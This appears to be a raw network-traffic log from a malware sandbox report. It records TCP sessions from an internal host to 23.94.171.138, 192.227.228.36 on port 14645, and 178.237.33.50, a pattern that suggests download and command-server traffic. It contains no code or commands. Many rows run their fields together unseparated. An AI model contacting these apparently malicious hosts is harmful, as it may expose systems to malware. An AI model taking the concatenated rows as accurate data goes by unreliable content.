                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235096931 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235117912 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235129118 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235157013 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235228062 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235236883 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235246897 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235291958 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235584974 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235650063 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235661983 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235712051 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235769987 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235811949 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.235877037 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236233950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236243963 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236268997 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236335993 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236350060 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236397028 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236469030 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236480951 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236521959 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236949921 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.236988068 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237114906 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237124920 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237135887 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237158060 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237335920 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237348080 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237359047 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237380981 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.237416983 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290250063 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290270090 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290282965 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290344954 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290355921 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290369034 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290385008 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.290386915 CET5564880192.168.2.823.94.171.138
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 18, 2024 16:52:59.290453911 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.290539026 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.290551901 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.290606022 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.290657043 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.290699005 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.290719986 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.290733099 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.290776968 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.293143988 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.293186903 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.293200016 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.293236017 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.293271065 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.293318033 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.352813005 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.352838993 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.352853060 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.352868080 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.352957964 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.352960110 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.352977037 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353034019 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.353075027 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.353224039 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353239059 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353252888 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353264093 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353288889 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.353322983 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.353496075 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353653908 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353707075 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353718996 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353724003 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.353759050 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.353864908 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353876114 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353883028 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.353938103 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.354054928 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.354109049 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.354208946 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.354270935 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.354283094 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.354334116 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.354804039 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.354815960 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.354829073 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.354852915 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.354886055 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.404283047 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.404320955 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.404337883 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.404479980 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.407246113 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407282114 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407294989 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407351017 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.407418966 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.407501936 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407526970 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407541037 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407552004 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407578945 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.407614946 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.407655001 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407666922 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407677889 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.407722950 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.410321951 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.410342932 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.410355091 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.410367966 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.410379887 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.410392046 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.410408974 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.410459042 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.470669985 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.470719099 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.470731974 CET  80           55648      23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:59.470796108 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:59.674040079 CET  55648        80         192.168.2.8      23.94.171.138
Nov 18, 2024 16:53:20.916033030 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:20.921117067 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:20.921315908 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:20.927366018 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:20.932527065 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:21.635476112 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:21.662868977 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:21.663045883 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:21.672665119 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:21.677603960 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:21.677707911 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:21.682720900 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:21.847357988 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:21.849828959 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:21.854818106 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:22.530607939 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:22.530642986 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:22.530688047 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:22.531085014 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:22.531152964 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:22.540098906 CET  55650        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:22.545831919 CET  14645        55650      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:22.545933008 CET  55650        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:22.549454927 CET  55650        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:22.554644108 CET  14645        55650      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:22.974822998 CET  55651        80         192.168.2.8      178.237.33.50
Nov 18, 2024 16:53:22.981041908 CET  80           55651      178.237.33.50    192.168.2.8
Nov 18, 2024 16:53:22.981142044 CET  55651        80         192.168.2.8      178.237.33.50
Nov 18, 2024 16:53:22.981270075 CET  55651        80         192.168.2.8      178.237.33.50
Nov 18, 2024 16:53:22.986412048 CET  80           55651      178.237.33.50    192.168.2.8
Nov 18, 2024 16:53:23.220633030 CET  14645        55649      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:23.221951008 CET  55652        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:23.227137089 CET  14645        55652      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:23.227227926 CET  55652        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:23.230794907 CET  55652        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:23.236063004 CET  14645        55652      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:23.272342920 CET  55649        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:23.300909042 CET  14645        55650      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:23.333911896 CET  14645        55650      192.227.228.36   192.168.2.8
Nov 18, 2024 16:53:23.333996058 CET  55650        14645      192.168.2.8      192.227.228.36
Nov 18, 2024 16:53:23.338367939 CET  55650        14645      192.168.2.8      192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.344831944 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.344891071 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.350312948 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528800964 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528837919 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528852940 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528912067 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528927088 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528939009 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528951883 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.528973103 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529046059 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529083967 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529097080 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529109955 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529149055 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529158115 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529208899 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529306889 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.529372931 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.535887003 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.536029100 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.536114931 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652585030 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652683973 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652698994 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652713060 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652728081 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652754068 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652796984 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652848005 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652868032 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652880907 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652894020 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652900934 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652906895 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652919054 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652923107 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.652947903 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.653491974 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.653539896 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.653686047 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.653698921 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.653733969 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.770700932 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.770750999 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.770767927 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.770795107 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771017075 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771069050 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771174908 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771188021 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771202087 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771224976 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771330118 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771343946 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.771365881 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772016048 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772068977 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772154093 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772313118 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772353888 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772494078 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772509098 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772522926 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.772547007 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.817079067 CET8055651178.237.33.50192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.817150116 CET5565180192.168.2.8178.237.33.50
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.818933010 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.841691017 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.847270966 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.891846895 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.891864061 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.891875029 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.891905069 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.891916037 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.891959906 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892049074 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892059088 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892071962 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892085075 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892092943 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892127037 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892313004 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892667055 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892678022 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892688990 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892698050 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892709017 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892724037 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.892972946 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.893018961 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.944283009 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.947961092 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.948023081 CET5565214645192.168.2.8192.227.228.36
Timestamp                         Source Port  Dest Port  Source IP       Dest IP
Nov 18, 2024 16:53:23.952481031 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:23.958657980 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:23.958740950 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:23.963715076 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012237072 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012264967 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012279987 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012291908 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012305021 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012311935 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.012353897 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.012401104 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012453079 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.012517929 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012531042 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012562990 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.012651920 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012711048 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012722969 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012747049 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.012814999 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012826920 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.012851000 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.013597012 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.013622999 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.013633013 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.013648987 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.013669014 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.132416964 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132455111 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132467985 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132503033 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.132566929 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132577896 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132590055 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132602930 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132613897 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.132631063 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.132693052 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.132726908 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.133028984 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.133095026 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.133122921 CET  14645  55650  192.227.228.36  192.168.2.8
